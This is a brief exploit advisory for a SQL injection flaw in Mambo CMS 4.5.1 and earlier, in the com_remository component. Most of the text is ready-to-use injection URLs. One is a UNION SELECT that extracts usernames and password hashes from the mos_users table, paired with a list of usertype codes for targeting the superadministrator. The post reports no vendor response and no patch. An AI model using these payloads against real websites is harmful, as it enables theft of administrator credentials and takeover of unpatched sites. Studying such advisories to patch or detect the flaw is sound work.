Mambo versions 4.5.1 and below are susceptible to a SQL injection vulnerability.
4d025889e22337402a892e1c2a8fc928680f8c29a942f1164367af073911141a
Vendor
www.mamboportal.com
Message from vendor : Mambo is one of the most powerful Open Source Content Management Systems on the planet. It is used all over the world for everything from simple websites to complex corporate applications. Mambo is easy to install, simple to manage, and reliable.
Bug name : SQL injection
Version : lastest Version 4.5.1(1.0.9) and lower.
Exploit :
https://www.mamboportal.com/index.php?option=com_remository&Itemid=27&func=fileinfo&parent=folder&filecatid=499%20and%201=0[SQL]/*
You can exploit from the table "mos_users" with the query below
https://www.mambosite.com/index.php?option=com_remository&Itemid=[id]&func=selectfolder&filecatid=[id]%20and%201=0%20union%20all%20select%201,2,3,4,username,6,password,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20mos_users%20where%20usertype=0/*
with the values of usertype :
0 = superadministrator
1 = administrator
2 = editor
3 = user
5 = publisher
6 = manager
Vendor feedback :
Not yet
Vendor patch :
Not yet
khoai
www.xfrog.org